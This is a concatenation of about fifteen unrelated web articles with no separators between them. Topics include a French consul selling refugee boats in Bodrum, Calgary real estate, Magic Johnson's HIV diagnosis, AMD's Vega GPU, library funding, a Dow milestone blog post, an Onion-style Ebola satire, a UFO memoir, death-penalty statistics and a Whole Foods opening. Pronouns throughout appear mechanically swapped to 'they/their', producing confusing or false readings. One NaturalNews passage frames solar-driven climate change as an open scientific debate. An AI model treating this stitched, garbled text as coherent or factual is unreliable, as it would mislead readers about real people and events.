A French reporter looking for the source of boats used by refugees to get to Europe from Turkey followed the trail to a shop belonging to the French honorary consul in the port town of Bodrum .
Footage from France 2 showed Francoise Olcay selling the rubber boats and lifejackets from their shop which had a French flag and a ‘ consular agency of France ' sign hanging outside . They have now been suspended .
In the video they admit to taking part in selling the goods , but also implicates local Turkish authorities and says that if they did n't sell them , they would be bought elsewhere .
Bodrum has become a portal to Europe to thousands of refugees . It was along this coastline that three-year-old Aylan Kurdi drowned along with their mother and brother and nine other Syrians when their boat capsized as they headed for Greece .
Calgary commercial real estate felt the pinch of lower oil prices during the first quarter , according to two new market reviews .
A RealNet Canada Inc. report Monday said 111 transactions of at least $ 1 million occurred during the quarter , down 28 from a year earlier . The total dollar volume — $ 753.1 million — was off by 11 per cent .
Meanwhile , a report by Cushman & Wakefield said the premium office market in Calgary is already “ reeling from the sudden impact of downsizing companies ” as the city is on the brink of a recession due to gutted oil prices , with more pain expected .
Its Canadian office market outlook said that without a sustained oil price recovery Calgary 's premium office market will see vacancy climb from 4.7 per cent to 12.4 per cent by the end of 2015 and to 15.4 per cent by the end of 2016 , figures not seen since the early 1990s .
In the first quarter , a record 1.23 million square feet of space was returned to market by retrenching companies , it said .
“ On top of low office demand and companies subletting record amounts of space , we 're in the midst of a major development cycle with about three million square feet under construction downtown . Right now , it 's a perfect storm , ” said Bob McDougall , senior managing director of brokerage for Cushman & Wakefield in Calgary .
“ The first quarter probably bore the brunt of the oil shock , but we 'll see more bleeding if oil prices remain low . ”
The apartment sector saw transaction value soar by 574 per cent , to $ 171.4 million , from a year earlier .
Other sectors increases were : hotel : $ 68 million ( 583 per cent ) ; industrial : $ 169.6 million , ( +20 per cent ) and industrial land , $ 74.5 million ( +10 per cent ) .
Decreases were recorded in retail : $ 90.4 million ( down 41 per cent ) ; office : $ 35.3 million ( off 86 per cent ) and residential land : $ 143.9 million ( down 22 per cent ) .
mtoneguzzi @ calgaryherald.com
Twitter.com/MTone123
Former Los Angeles Lakers basketball star Earvin “ Magic ” Johnson announced at a press conference on November 7 , 1991 , that they had HIV and retired from professional basketball . They acquired their infection through heterosexual transmission . At the time of their announcement their wife was pregnant , and both they and the fetus had tested negative . In their book entitled , My Life , Johnson admitted to having casual , unprotected sex with many women . After winning five NBA championship rings , an Olympic gold medal , and an NCAA championship , one of our national sports icons was faced with a life-threatening HIV infection .
Johnson 's announcement increased the public 's awareness and concern about HIV and the behavioral changes that would lead to reduced risk . The nonprofit Magic Johnson Foundation , founded in December of 1991 , was charged with educating the public about HIV and with providing supportive HIV programs to address the social needs of inner-city children and young adults throughout the United States .
Johnson attempted brief professional comebacks from 1992–1993 and 1995–1996 . During the 1992–1993 season , several players voiced their concerns . Basketball is a highly physical sport ; thus , players may collide , crash , and inadvertently draw blood from one another while fighting for rebounds . Karl Malone of the Utah Jazz expressed their fears and opposition toward Johnson 's first comeback . They pointed to the scars and scabs on their arms and said , “ They ca n't tell me you 're not at risk . And you ca n't tell me there 's one guy in the NBA who has n't thought about it. ” Other players , however , seemed very receptive to Johnson 's return to basketball . Phoenix Suns player Charles Barkley added , “ It 's not like we are going to have unprotected sex with Magic on the floor. ” Later , Malone supported Magic 's decision to come back for a second time in 1995 .
As soon as Magic Johnson was diagnosed with HIV , they began antiretroviral therapy under the supervision of the Laker 's team physician , Dr. Michael Mellman , and HIV expert Dr. David Ho . Within a few months , their viral load was reduced . In 1999 , Johnson 's wife , Cookie , said in an interview that their husband was healed . Johnson said there were no traces of virus in their bloodstream . Sixteen years after their announcement , Johnson is still alive and living normally . They remain a tireless crusader against acquired immunodeficiency syndrome ( AIDS ) .
Magic Johnson 's viral loads are undetectable . Are they cured , or can they be considered “ virus-free ” ? Explain your answer .
Technology
AMD gives glimpse of how ‘ Vega ' might impact design viz and simulation
New GPU architecture to give fast access to huge architecture and engineering datasets . By Greg Corke
With AMD Solid State Graphics ( SSG ) , which looks set to come of age with Vega , users can explore huge viz datasets in real time - such as this 600GB physically-based rendered architectural interior scene
AMD is starting to give some clues as to how its next generation Vega GPU architecture might benefit design , engineering and architecture firms - beyond the givens of real time visualisation , Virtual Reality ( VR ) and static physically-based rendering .
Much of this appears to hinge on Vega 's re-architected memory architecture , which gives the GPU the ability to access Terabytes of virtual address space through a high-bandwidth cache controller .
At the recent AMD Technology Summit in California , AMD showed a raw tech demo of an architectural interior scene where the user could navigate freely around the space .
This was n't a ‘ game engine ' experience based on OpenGL or DirectX . It was a ‘ photorealistic ' environment that had been pre-rendered with AMD 's physically-based rendering technology , Radeon ProRender .
Ray-tracing with any physically-based renderer is hugely computed intensive and a single image can take hours to refine , even on a very powerful GPU .
For the live demo , the workstation 's GPU was n't ray tracing in real time ( AMD pre-rendered the equivalent of 1,000 frames using multiple GPUs ) Instead it was working hard to construct the view as the user navigated the scene .
This looks very similar to what Nvidia is doing with Iray VR ( interactive photorealism , albeit in Virtual Reality ) .
The interesting thing about AMD 's demo was the size of the dataset and where it was stored in relation to the GPU . A total of 600GB was being streamed in and out of GPU memory from the GPU 's on-board Solid State Drive ( SSD ) .
AMD has dubbed this on-board SSD , Solid State Graphics ( SSG ) . And because the SSG is right next to the GPU , data moves very fast - at a rate of 5GB/sec , according to AMD 's Takahiro Harada .
A traditional GPU 's memory currently maxes out at 32GB , so bigger datasets must be streamed on demand over the PCIe bus , read from the workstation 's SSD or system memory , via the CPU .
It was only by using the SSG as a fast buffer between system storage and GPU memory that AMD was able to deliver this physically-based rendering experience in real time . Without the buffer , the area of navigable floor space would have been much smaller – or there would likely have been significant pauses as fresh data was loaded up to the GPU .
AMD 's technology demonstration was far from polished . Harada admitted that they only had two days to prepare the demo , which was not enough time to fully render the images so they were left unresolved and quite grainy . There was also some lag on navigation ( nowhere near the 30+ FPS you expect from a game engine experience ) but AMD was keen to point out this was an early research project , rather than a product .
While the demo focused on architecture , Harada agreed that this technology would also be very relevant to other sectors such as automotive . Currently , firms carry out interactive design review with OpenGL-based applications such as Autodesk VRED , which approximates lighting , reflections and shadows , albeit in a very convincing way . With physically-based rendering , because light is simulated , rendered images should more accurately represent objects as they would appear in the real world .
AMD believes that Vega will help GPU memory capacity keep pace with processing power
Thanks to its new high-bandwidth cache controller , Vega will be able to access up to 512TB of virtual address space
AMD first announced its SSG technology ( Radeon Pro SSG ) at Siggraph in August 2016 . This first technology preview was based on AMD 's Fiji architecture , but it looks like Vega will take SSG to a whole new level .
With Fiji , for ISVs ( Independent Software Vendors ) to bind data on the SSG , custom code would need to be written to make calls to OpenCL extensions , OpenGL extensions or DirectX extensions .
With Vega it sounds like software will be able to take advantage of the Radeon Pro SSG without having to change code , as Raja Koduri , senior vice president and chief architect , Radeon Technologies Group , AMD , told DEVELOP3D . “ In Vega because of the high-bandwidth cache , and the controller we have , we can provide transference mechanisms . The ISV does n't really need to do anything . We can map SSG memory directly to the high-bandwidth cache and move data directly between them . ”
This could have huge implications for GPU compute , particularly in simulation ( CAE ) . Traditionally , when using the GPU to solve FEA or CFD problems the CPU has to break down jobs into bite sized chunks that can be loaded into GPU memory . With SSG , it sounds like it would be possible for one GPU to solve extremely large problems . This would mean AMD 's stated vision from a few years back of being able to simulate on a single node , could come to fruition .
In 2015 AMD also broke down some barriers for its GPUs to be adopted for GPU compute . As part of its Boltzmann Initiative , AMD made it easier for software developers to convert applications written in C for CUDA ( which only run on Nvidia GPUs ) into OpenCL ( the open compute standard , supported by AMD and other vendors ) .
In theory this means firms like Ansys , who have a made a large investment in CUDA , could easily port code to OpenCL to take advantage of the ‘ Vega ' Radeon Pro SSG and its ability to work with huge engineering datasets . If that is the case then AMD could make a much bigger impact in a niche market that has traditionally been dominated by Nvidia .
AMD is due to launch Radeon Pro professional GPUs based on Vega in 2017 . It has already announced the AMD Radeon Instinct MI25 accelerator , a passively cooled server GPU for deep learning , which should deliver an expected 25 TFLOPS of peak FP16 ( half precision ) performance , which is similar to that of the Nvidia Quadro P6000 . For peak FP32 ( single precision ) we expect this to be 12.5 TFLOPS .
If you enjoyed this article , subscribe to AEC Magazine for FREE
During their industry panel at Anime Expo this afternoon , Viz announced their plan to release a print edition of the Dragon Ball Super manga in spring 2017 .
Viz began publishing the Dragon Ball Super manga on their website for free last week . The second chapter was posted earlier today .
While the Dragon Ball Super television series has been licensed for certain international territories , no announcement has been made for North America .
The Dragon Ball Super manga began in June 2015 as a promotional tie-in for the television series . The manga runs monthly in Shueisha 's V-Jump magazine , with the series ' thirteenth chapter most recently running in the magazine 's August 2016 issue . Illustrated by “ Toyotarō ” ( in all likelihood , a second pen-name used by Dragon Ball AF fan manga author and illustrator “ Toyble ” ) , the Dragon Ball Super manga covered the Battle of Gods re-telling , skipped the Resurrection ‘ F ' re-telling , and “ charged ahead ” to the Champa arc to act as further promotion for the television series . The first collected volume , covering the first nine chapters and one bonus chapter , was released this past April .
Thanks to @ NJ_ for the heads-up and photo !
Recently , Terry Deary , author of the children 's books Horrible Histories , created a bit of a stir when they claimed that libraries are no longer relevant and that they hurt authors and the publishing industry . Speaking at their local council meeting , Deary said :
We 've got this idea that we 've got an entitlement to read books for free , at the expense of authors , publishers and council taxpayers . This is not the Victorian age , when we wanted to allow the impoverished access to literature . We pay for compulsory schooling to do that…The libraries are doing nothing for the book industry . They give nothing back…Why are all the authors coming out in support of libraries when libraries are cutting their throats and slashing their purses ?
Of course , the response was swift and passionate .
“ Selfish & stupid , shortsighted & sad . Mostly selfish . Terry Deary gets avaricious & anti-library : bit.ly/15de7Ve ” – Neil Gaiman ( @ neilhimself ) February 13 , 2013
Others questioned Deary 's arguments about royalties . For instance , not only do libraries purchase their books from publishers , putting money into author 's pockets ; but also under the UK 's Public Lending Right , Deary has personally earned 6.2p every time their book was borrowed ( with a cap of £6,600 ) . They also assume that borrowing and buying books are mutually exclusive choices .
Moreover , although Deary also believes schools offer sufficient exposure to literature , it has been my experience that schools offer only limited exposure to genre fiction . Therefore , many fans of genre fiction are left to scour their local libraries for books about magic , dragons , and elves .
When I was young , I loved going to the library because I was free to pick books I liked and ignore those I did n't . I could develop my own tastes , free from the pressures of book report assignments and tests . I discovered new authors and series , and those discoveries led to lifetime of reading . To this day , I buy many books , and I still borrow many books .
But why do I bring up Deary 's comments on this site ? While it 's easy to attack Deary 's remarks , I think what has been lost in the shuffle is how their remarks fit into the larger discussion of the future of the publishing industry . Think about the issues Deary mentioned : pricing , royalty payments , access to books , and discovery of new authors . These are the same underlying issues that surface during discussions of traditional publishing vs. self-publishing ; book pirating ; and comparing the advice of friends , booksellers , and librarians to the algorithms of Amazon or Goodreads .
Too often these discussions about the future of publishing predict game-changing technologies , dramatic and rapid shifts , and a world that is radically different from the current state of things . Understandably , these predictions or calls to action can be upsetting to many ( rightly so in the case of Deary , I 'd say ) . Change can be an uncomfortable process . But I am willing to bet that for the most part , the future of publishing will look a lot like the present . Why ? Just take a look at the libraries Deary wishes to do away with .
On the one hand , libraries are more or less the same as they ever were : a place where the community can access a wide variety of books . They remain places of education and culture . On the other hand , they have also evolved and adapted to the twenty-first century . Visitors can borrow ebooks and audio books . Visitors can “ borrow ” computers and access the internet . They can also take classes on subjects such a programming and web design . Libraries are the same , yet different . They have experienced evolutionary change , not revolutionary . Perhaps this is why at a time when bookstores are becoming an endangered species , libraries survive .
So when you hear arguments like Deary 's or predictions that publishing 's end times are near , do n't get angry or assume the worst . Instead , get to a library , and get reading . After all , for readers like me , the old publishing industry will always live on because there are few pleasures that can compare with walking down aisle after aisle of books , looking at colorful covers , holding a newly discovered book in your hands , and breathing in the scent of ink and paper .
Title image by Miháy Bodó .
Hullabaloo
Tuesday , February 28 , 2012
Dow Hits 13,000 under Class Warfare President
by David Atkins
I guess good times are here again on Wall Street :
U.S. stocks closed at multi-year highs , as investors weighed a small pullback in oil prices and improving consumer confidence against a worse-than-expected drop in durable goods orders .
The Dow Jones industrial average ( INDU ) closed above 13,000 for the first time since May 19 , 2008 , after narrowly missing that finish line for the past several trading days . The DJIA added 24 points , or 0.2 % . While the 13,000 level is not considered technically significant , it is a psychological milestone .
I personally detest the use of stock indices as a measure of economic health . In an age where the top 1 % who own the vast majority of stock investments are so utterly disconnected from the rest of us , cheering the rise of the Dow is about as useful as cheering discounted prices on yachts . Sure , a rising market helps 401Ks ( for what that 's worth ) and can sometimes be a predictor of lagging employment increases -- though given our increasingly jobless recoveries , the latter is less and less true . But generally speaking , a healthier stock market does n't mean a whole lot to the rest of us . In fact , I think one of the most baneful legacies the Clinton Administration left us was a national obsession with stock market indices as the key measure of our national prosperity , when they used to be the more appropriate concern of the dull business section on page 4 of your newspaper .
Still , Wall Street has a nice psychological gain to cheer about today .
Not that it will matter , of course . Our neoliberal president who has done essentially everything the Bond Lords asked for , will still get smeared from now through November as a radical class warrior because they once dared to hurt their widdle feelings by calling them fat cats that one time .
The funny thing is that these financial genius Masters of the Universe will try in a fit of pique to get a Republican president elected , who will in turn without question escalate a war with Iran , creating oil shocks that will crash the economy again , devastating most of their portfolios ( though a few profiteers will make out like bandits . )
These guys may be quantitative mavens with a sociopathic talent for manipulating their fellow man , but geniuses they are n't . They 're trying to kill their golden goose because it once honked at them the wrong way .
.
thereisnospoon 2/28/2012 03:00:00 PM
( NaturalNews ) Researchers from Wageningen University in the Netherlands say that insects produce far less greenhouse gases than cattle and pigs do , and would thus be a viable alternative to eating meat . Published in the journal PLoS ONE , the study found that pigs , for instance , produce up to one hundred times more greenhouse gases than the equivalent weight of mealworms.Researchers compared the greenhouse gas emissions of mealworms , crickets , locusts and pigs . Particularly with methane ( CH4 ) and nitrous oxide ( N2O ) , the insects produced far lower emissions than pigs did overall . Ammonia emissions , which can pollute groundwater supplies , were also lower among insects compared to cattle.Researchers did not verify that actually producing insect protein for human consumption is as environmentally-friendly as producing cattle and pig protein , pound for pound . So while the idea may sound beneficial in theory , it is unknown whether or not it would work in real life ........ While some scientists insist that elevated levels of human-made greenhouse gases like carbon dioxide ( CO2 ) are getting trapped in the atmosphere and causing global climate change , other scientists say that the sun is the true culprit , and that cyclical climate change is completely normal ( www.sciencedaily.com ) . This topic remains hotly debated .
ATLANTA—In a sudden , unscheduled announcement Tuesday , officials from the Centers for Disease Control revealed that they were giving away free ice cream , had enough of the frozen dessert for everyone , and that , by the way , there had also been an outbreak of the deadly Ebola virus in the United States .
CDC director Thomas R. Frieden led the emergency press conference , during which they called for all Americans to step right up and get as much of the tasty ice cream as they wanted , and , in unrelated news , 162 Ebola-related deaths have been reported in 12 states .
Advertisement
`` Strawberry , chocolate , butter pecan—so many delicious flavors , '' said Frieden , who added that this just had to be the greatest day ever , and how could anyone have a care in the world , what with all this free ice cream up for grabs . `` We also have sundaes and sorbets and , look at us , we 're all having such a wonderful time ! ''
Continued Frieden , clearing their throat , `` The Ebola virus attacks white blood cells indiscriminately , eventually leading to systemic organ failure as the infected individual literally dissolves from the inside out . There is a 10 percent chance of survival . ''
Bringing a large spoon of rocky road to their lips , Frieden went on to explain that the CDC was still not sure how the lethal hemorrhagic fever had originated , why it was spreading and mutating at such an alarming rate , or whether the agency was even remotely prepared to deal with the deadly pandemic expected to overtake the country within 72 hours .
Advertisement
The only thing they knew for sure , Frieden told reporters , was that ice cream was always creamy and delicious , so let 's not even worry about all that other stuff , and just dig in already .
`` I scream , you scream , we all scream for ice cream ! '' shouted CDC spokesperson Martha Hare , who joined Frieden up on stage and began frantically handing out cartons of the sweet summertime dessert to all in attendance . `` Those shrieks , they are definitely for ice cream . Those shrieks , they are not in any way the result of sudden ocular hemorrhaging . Yes , everyone is having a delightful time screaming their heads off about ice cream . ''
Advertisement
`` Look ! '' Hare continued . `` Look at all these crunchy waffle cones ! ''
According to officials , federal response teams are currently setting up triage units all across the country and urging every citizen to `` go ahead and put some chocolate sauce right on top of that ice cream now , because within 21 days , none of this is going to matter anyway . ''
In addition , the agency explained that unless something is done to stop the latest strain of the virus , which appears to be transmittable through skin contact and airborne agents , close to 96 percent of the population could be wiped out , `` so , great news—more tasty ice cream for the rest of us ! ''
Advertisement
`` This will easily be the most lethal epidemic in U.S. history , '' said Dr. Howard Copeland , a triage-unit surgeon who was called in by the government to deal with `` all the fun everyone is having . '' `` Fever , vomiting , massive body rashes , blood pouring out from the ears . These are all symptoms of Ebola . ''
Added the man whom the CDC has dubbed Dr . Happy Party Time , `` Now , um , who wants some sprinkles on their sundae ? ''
Records indicate this is n't the first time the agency has offered the American public a special treat . In March 1982 , the CDC delivered news of a virulent new strain of influenza while simultaneously setting off a series of jaw- dropping fireworks . And in 2003 , agency director Julie Gerberding informed the public of a possible anthrax outbreak while wearing an oversized sombrero and throwing free tokens into the air at a local Chuck E. Cheese 's .
Advertisement
Though epidemiologists have predicted the Ebola virus will utterly devastate the populace , the economy , and the entire civilization of the United States , most are taking the terrifying news in stride .
`` Oh , man , this is so , so good , '' said Seattle resident Michael Sturges , their eyes rolling back in their head as their inflamed orifices excreted a relentless flow of liquefied waste . `` Cookies and cream ! Mmm-hmm . It 's the best . ''
“ With the passage of more than 50 years since my incident in Minot and 70 years since the incident in Roswell , NM , there can be no ethical , moral or critical reason to keep the secret of humanity any longer and my other colleagues agree thereby . ”
Here 's another one of those old-is-news-again stories that keeps people suspicious of what governments may be hiding about UFOs . On December 6 , 1966 , the Minot Daily News in Minot , North Dakota , carried a front page story about recent UFO sightings in the area , especially around the Minot Air Force Base , home of a number of nuclear missiles poised to be launched if the Cold War heated up . That story is back on the front page again 50 years later with the release of It Never Happened , Volume 1 , a tell-mostly-all-before-I-die memoir of the incident by Captain David D Schindele , a Minuteman I intercontinental ballistic missile launch crew commander at the base on that day . Schindele claims that nothing more was reported about the UFO sightings because the Air Force ordered everyone there to never in their lives speak about what happened next … the unexplained change in status of 10 ICBMs to ‘ off-alert ' – meaning that they could not be launched .
“ I remember that when we were relieved the next morning and arrived topside , I attempted to query the Flight Security Controller , who told me they could not speak about the incident . It was then that my commander also informed me that they had received word , during my rest break below , that we were to never speak about the incident . ”
Schindele kept silent until 2010 , when they first revealed their experiences to Robert Hastings , author of UFOs & Nukes : Extraordinary Encounters at Nuclear Weapons Sites . Why did Schindele finally disobey that order ?
“ During that time in Minot , many of us experienced unworldly incidents at Minuteman facilities but we were all individually instructed to keep silent . We never realized at the time that others among us were also experiencing incidents , but now the truth is becoming known . About 35 years after my Minot incident and learning about an identical incident experienced by another missileer ( Capt . Robert Salas ) connected to Malmstrom AFB in Montana , which was during the same general timeframe as my incident , I then contemplated coming forth with the ‘ truth ' . ”
These old “ missileers ” liked to get together to reminisce and commiserate and it seems that Schindele and Salas discovered they had something more than their service time in common . Schindele found additional officers from the base who would admit that they were individually ordered “ to keep our ‘ lips zipped ' ” but many took the secret to their graves and more refuse to disobey the order to this day .
This is ‘ old news ' in that there have been many reports of UFOs at nuclear missile sights and nuclear plants around the world , ranging from UFO activity at the plant where plutonium was processed for the first atomic bomb to UFO sightings at nuclear plants in France to documents from Russia indicating similar unexplained missile shutdowns in the Soviet Union after UFO sightings .
It 's ‘ new news ' that eyewitness David Schindele put their experiences in a book and , as the title indicates , has more to tell . Are they doing it for the money ?
“ From the beginning , I 've been conflicted with the goal of bringing truth to as many people as possible , while having no appetite for bringing attention to myself or receiving monetary benefit . But I also realize the fallacy in that . ”
Schindele says they will donate proceeds from the book to the Seattle Chapter of the Air Force Association where they still meet with fellow veterans .
Are the claims in the book true ? If so , will the government release any supporting documents or will the book suddenly go ‘ off-alert ' too ?
VIDEO SUMMARY OF THE 2015 YEAR END REPORT
FOR IMMEDIATE RELEASE
Death Penalty Use in 2015 Declines Sharply
Fewest Executions , The Fewest Death Sentences , and Fewest States Employing the Death Penalty in Decades
( Washington , D.C. ) The use of the death penalty in the U.S. declined by virtually every measure in 2015 . The 28 executions this year marked the lowest number since 1991 , according to a report released today by the Death Penalty Information Center ( DPIC ) . As of December 15 , fourteen states and the federal government have imposed 49 new death sentences this year , a 33 % decline over last year 's total and the lowest number since the early 1970s when the death penalty was halted by the U.S. Supreme Court .
Only six states conducted executions this year , the fewest number of states in 27 years . Eighty-six percent of executions this year were concentrated in just three states : Texas ( 13 ) , Missouri ( 6 ) , and Georgia ( 5 ) . Executions in 2015 declined 20 percent from 2014 , when there were 35 . This year was the first time in 24 years that the number of executions was below 30 .
Death sentences have been steadily declining in the U.S. over the past 15 years . The country has now imposed fewer death sentences in the past ten years than in the decade just before the U.S. Supreme Court declared the death penalty unconstitutional in 1972 .
“ The use of the death penalty is becoming increasingly rare and increasingly isolated in the United States . These are not just annual blips in statistics , but reflect a broad change in attitudes about capital punishment across the country , ” said Robert Dunham , DPIC 's Executive Director and the author of the report . DPIC tracks data on the death penalty , but does not take a position on capital punishment .
Relatively few jurisdictions handed down death sentences in 2015 . A single county — Riverside , California — imposed 16 % of all death sentences in the U.S. , and accounted for more death verdicts than any state , except for Florida . More than a quarter of the death sentences were imposed by Florida and Alabama after non-unanimous jury recommendations of death — a practice barred in all but three states . Texas , by contrast , imposed only two new death sentences in 2015.1 Nearly two-thirds of all new death sentences this year came from the same two percent of U.S. counties that are responsible for more than half of all death-sentenced inmates nationwide .
Read DPIC 's “ The Death Penalty in 2015 : Year End Report ” .
Even as the use of the death penalty declined , its most dangerous flaw remained apparent . Six death row prisoners were exonerated of all charges this year , one each in Alabama , Arizona , Florida , Georgia , Mississippi , and Texas . Since 1973 , a total of 156 inmates have been exonerated and freed from death row .
The number of people on death row dropped below 3,000 for the first time since 1995 , according to the latest survey by the NAACP Legal Defense Fund .
At least 70 death row prisoners with execution dates in 2015 received stays , reprieves , or commutations , 2.5 times the number who were executed .
In addition , there is an ongoing risk that judicial review is inadequate to protect capital defendants with serious intellectual disabilities or crippling mental illness . DPIC 's report states : “ The death penalty is supposed to be reserved for the worst of the worst crimes and the worst of the worst offenders . However , … [ t ] wo-thirds of the 28 people executed in 2015 exhibited symptoms of severe mental illness , intellectual disability , the debilitating effects of extreme trauma and abuse , or some combination of the three . ”
To speak with Robert Dunham , DPIC 's Executive Director , please contact Anne Holsinger at 202-289-4022 or [ email protected ] .
# # #
The Death Penalty Information Center is a non-profit organization serving the media and the public with analysis and information on issues concerning capital punishment . DPIC was founded in 1990 and prepares in-depth reports , issues press releases , conducts briefings for the media , and serves as a resource to those working on this issue .
GRAPHICS FOR POSTING ON SOCIAL MEDIA
( Right click on `` Download '' and select `` Save Linked File '' or `` Save Target File '' )
Three-quarters of Americans think the federal government should regulate the release into the atmosphere of greenhouse gases from power plants , cars and factories to reduce global warming , according to a new Washington Post-ABC News poll , with substantial majority support from Democrats , Republicans and independents .
But fewer Americans -- 52 percent -- support a cap-and-trade approach to limiting greenhouse gas emissions similar to the one the House may vote on as early as tomorrow . That is slightly less support than cap and trade enjoyed in a late July 2008 poll . Forty-two percent of those surveyed this month oppose such a program .
The Washington Post-ABC News survey showed that support slipped slightly when people were asked whether they would be willing to pay higher prices in general or higher electricity bills in exchange for significant decreases in greenhouse gases . Although 62 percent of those surveyed said they would support regulation even if it raised the price of purchases and 56 percent would back cap and trade if it resulted in a $ 10 increase in utility costs , 44 percent said they would back a cap-and-trade system if it boosted monthly electricity bills by $ 25 .
`` I think there has n't been enough regulation , '' said Janet Opkyke , 60 , a freelance book editor in northern Michigan . `` Way back when deregulation started , I thought it was the wrong thing to do . I thought it was a license for greed . And I 'm glad to see it swinging the other way . '' They added , `` I think greenhouse gases are very harmful , and we have to do something about it . ''
Cap and trade is a signature issue for President Obama and the Democratic congressional leadership , and it is the centerpiece of the 1,201-page climate bill co-sponsored by Reps. Henry A. Waxman ( D-Calif. ) and Edward J. Markey ( D-Mass. ) . House Speaker Nancy Pelosi ( D-Calif. ) hopes to bring the measure to the House floor for a vote tomorrow -- before a week-long recess for the Fourth of July holiday -- but a dispute with Republicans over annual spending bills could delay that plan .
Pelosi called the bill `` a wonderful collaboration , '' and most environmental groups and a large number of companies endorsed it yesterday , despite last-minute concessions made to win the support of farm-state lawmakers led by the chairperson of the House Agriculture Committee , Rep. Collin C. Peterson ( D-Minn. ) .
`` These changes will not help the cause of making real reductions in greenhouse gases , '' said Frank O'Donnell , president of Clean Air Watch . `` And even some strong supporters of the Waxman-Markey legislation are now holding their noses , as if on the perimeter of a hog farm . ''
Nonetheless , American Farm Bureau Federation President Bob Stallman said yesterday in a statement that despite the changes , the group still opposes the `` seriously flawed '' climate legislation .
A cap-and-trade system sets a limit on the nation 's emissions of greenhouse gases , then issues or auctions emission allowances that can be bought or sold by individuals , funds and companies . Over time , the cap is lowered to reduce the nation 's emissions . Making emitters pay for carbon dioxide , a byproduct of burning fossil fuels , would provide incentives for developing renewable energy sources and new technologies to limit emissions from coal plants .
Debate over the cap-and-trade approach has focused on the cost to the average American . The Congressional Budget Office estimated this week that cap and trade would cost the average U.S. household $ 175 a year in 2020 , but House Republicans have pushed the message that the legislation would cost many times that and drive millions of jobs offshore .
That message has failed to sway liberal and moderate Republicans , 60 percent of whom back a cap-and-trade program , but it appeals to the party 's conservative base .
Tiffany Collins , 31 , a part-time children 's activity director at a church and a mother of four in Riverside , Calif. , said they do not think greenhouse gases are causing climate change . They said they read a report on the Internet saying climate change was linked to changes in the sun 's activity . But in any case , they do not support government intervention . `` I 'm opposed to the government overregulating just about everything . It costs us money , and they do n't do a very good job of it , '' they said .
One argument used by foes of climate legislation is that the United States should not take action unmatched by China and India , among the world 's fastest-growing economies and sources of greenhouse gases . But the Post-ABC poll showed that six in 10 Americans favor U.S. action , even if other countries do less to confront climate change .
One of the sharpest dividing lines in attitudes toward climate legislation was age , with younger adults more receptive to cap and trade and federal regulation of greenhouse gases . Nearly two-thirds of those younger than 30 said they support cap and trade , and eight in 10 support federal limits on emissions . Among seniors , about four in 10 said they back a cap-and-trade proposal , and half favor federal intervention on emissions .
Sensitivity to increased prices is highest among those in households with incomes under $ 50,000 . Nearly all of the drop-off in support for cap and trade or other greenhouse gas regulation comes among people who live in such households . Those in higher-income households were relatively unfazed by the increased costs .
The Post-ABC poll was conducted by telephone June 18 to 21 among a national random sample of 1,001 adults ; results have a margin of sampling error of plus or minus three percentage points .
Staff writer Paul Kane contributed to this report .
Javier Hernandez will surely have an eye on the Liga MX playoffs as their former club Chivas face Club America in the opening round .
For the same reasons that a hometown puffs up with pride whenever a local boy makes good , there exists a strong connection between Javier `` Chicharito '' Hernandez and the club that started them on their career as a professional , Club Deportivo Guadalajara , better known ( as Hernandez is by their nickname ) as Chivas .
Hernandez played only four years professionally for Chivas , leaving in 2010 , but they were a member of the youth corps before that , so their time with the club goes back to 1997 . With Chivas , Hernandez first made the dashing , exquisitely timed runs to goal that so often produce amazing results .
Their connection to their boyhood club remains strong . On Twitter , Hernandez posted a message of congratulations to the club for their long history in Mexico .
However , it 's likely to be Chivas and fans of the club congratulating Hernandez next . The dynamic forward is on the cusp of becoming the Mexican national team 's all-time leading goal scorer . Hernandez only needs four goals to become the leader and three to tie Jared Borgetti , who currently hold the record at 46 .
A move to Germany revitalized Hernandez . After five years in England , their skills were growing stale riding the bench at Manchester United . Now playing in regular games as part of Bayer Leverkusen , Hernandez is performing well for both club and country .
On the club level , Hernandez and their teammates are celebrating reaching the Champions League .
. @ CH14_ on their favorite moments of the @ Bundesliga_EN season so far ( spoiler : they include @ ChampionsLeague dreams ! ) pic.twitter.com/xkcy8OAbVA - Bayer 04 Leverkusen ( @ bayer04_en ) May 5 , 2016
With the national team , the dynamic forward is one of the Mexico 's leaders in the slate of upcoming important international competitions , including this summer 's Copa America , where many expect they will play well and claim the national team scoring record .
In contrast , things have n't gone so well for Guadalajara since Hernandez left the team . The club was still recently fighting back the threat of relegation . That 's a far cry from when the team used to compete regularly for a title .
Though they only scored one goal in the 2006 Apertura season for Guadalajara , Hernandez was still a part of the team that won the league championship for Chivas back then . It remains the only league title the club has won in the 21st century , after winning ten before that .
While it makes perfect sense that Chivas fans feel proud of the exceptional player their club helped develop , it does n't replace feeling proud of the club itself . However , as Chivas heads into the Clausura 2016 Liguilla quarterfinals against Club America , it 's been a decade since their supporters could feel that championship sense of accomplishment . While Chivas could always surprise with a run to another title , it 's going to be a daunting task as they open the playoffs against arch-rivals Club America . It 's more likely that Chivas fans will instead be celebrating more goals by Hernandez for El Tri or Bayer Leverkusen soon .
However , there 's always the possibility that Hernandez will once again return to play for their boyhood club . Mexico veteran defender Rafael Marquez did that earlier this year , joining Atlas to wind down their professional career with the same club they originally started with .
Hernandez certainly seemed to welcome the idea when it was raised .
Javier Hernández : '' Obviamente me encantaría volver a ese club ( Chivas ) , es el único que está en mi corazón , el que voy a amar siempre '' . - Ciro Procuna ( @ cprocuna ) May 10 , 2016
Chivas fans would probably hope they do n't have to wait until the return of Hernandez to feel gratified by their team again . Until then , they 'll join many Mexico fans in celebrating the accomplishments of Hernandez , with perhaps an extra bit of pride in their team 's history with the player .
Andrea Canales covers both Liga MX and the Mexican national team for ESPN FC . Follow them on Twitter @ soccercanales .
By Gill South
Today at 9:30 a.m. a new Whole Foods Market broke bread rather than cut a ribbon , and opened for business in the rapidly transforming Gilman shopping district in West Berkeley . The store , and the competition it represents , has been a catalyst for at least one other local grocery chain to sharpen up its act . Early reports suggest the market will be a welcome addition to the neighborhood for local residents .
An estimated 600 people took tours of the new Whole Foods store last week in the lead-up to today 's opening at its location on 10th and Gilman streets . This is the second Whole Foods store for Berkeley ( the first one opened at Ashby and Telegraph in 1990 ) , the 41st Whole Foods in Northern California , and the 401st nationwide . It will be open 8 a.m. until 10 p.m. daily while the Whole Foods-owned Allegro Coffee roastery in-store , its first outlet on the West Coast , will be open from 6 a.m. every day .
The 47,000-square-foot market , with 85 car parking spaces , including electric charging spots , and 12 bike spaces , is employing 200 staff , two-thirds of them from other Whole Food stores while the rest are new staff members , said outreach team leader Kristen Tantarelli .
